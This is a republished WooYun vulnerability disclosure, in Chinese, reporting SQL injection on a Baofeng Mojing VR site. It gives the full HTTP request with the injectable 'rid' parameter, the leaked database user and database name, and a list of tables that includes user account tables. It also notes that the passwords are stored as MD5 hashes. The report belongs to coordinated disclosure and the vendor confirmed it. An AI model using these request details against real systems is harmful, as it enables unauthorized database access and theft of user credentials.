暴风魔镜某站存在SQL注入(涉及大量账号密码)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

暴风魔镜某站存在SQL注入(涉及大量账号密码)

详细说明:

友情检测,求分



code 区域
POST /List/vr/praise/ HTTP/1.1
Host: vr360.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://vr360.mojing.cn/List/vr/picdetail?id=660
Content-Length: 32
Cookie: Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462336535; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462342590; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3971414470516277,tid:1462336535057720}; NTKF_T2D_CLIENTID=guest31BD2928-36A8-EE57-E997-755687CC4B1E; user_regist_plat=1; PHPSESSID=f4seia83q3qpjjgsc3r037reb6; Hm_lvt_4f15bce7f77b74e9932fc896a915f5b8=1462344105; Hm_lpvt_4f15bce7f77b74e9932fc896a915f5b8=1462344113
Connection: close

rid=660&praise=0&resource_type=3





code 区域
注入参数#rid





code 区域
当前数据库用户:[email protected]%
当前数据库:mojing_bgc





漏洞证明:

 

code 区域
acl_menu_url
acl_permissions
acl_resources
acl_roles
acl_roles_change
acl_user_to_role
acl_users
bgc_ad
col_info
company
company_data_join
company_join_change
country
email_remind
manager_page
mode_title_manager
mode_config
navigation_manager
news
news_title
pic_pano
pic_pano_task
region
res_title
res_label
res_lc_link
resource_col_info
resource_download
resource_love
resource_manager
resource_offline
resource_stat
resource_stat_data
resource_status
resource_support
resource_sync_cms
users_baseinfo
users_info_ext
video_hot
video_manager





不知道是否是内部的账号,登录ip显示为内网



1.png



1.png





md5加密方式

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 16:34

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:暴风魔镜某站存在SQL注入(涉及大量账号密码) - https://www.15qq.cn/wooyun/669.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知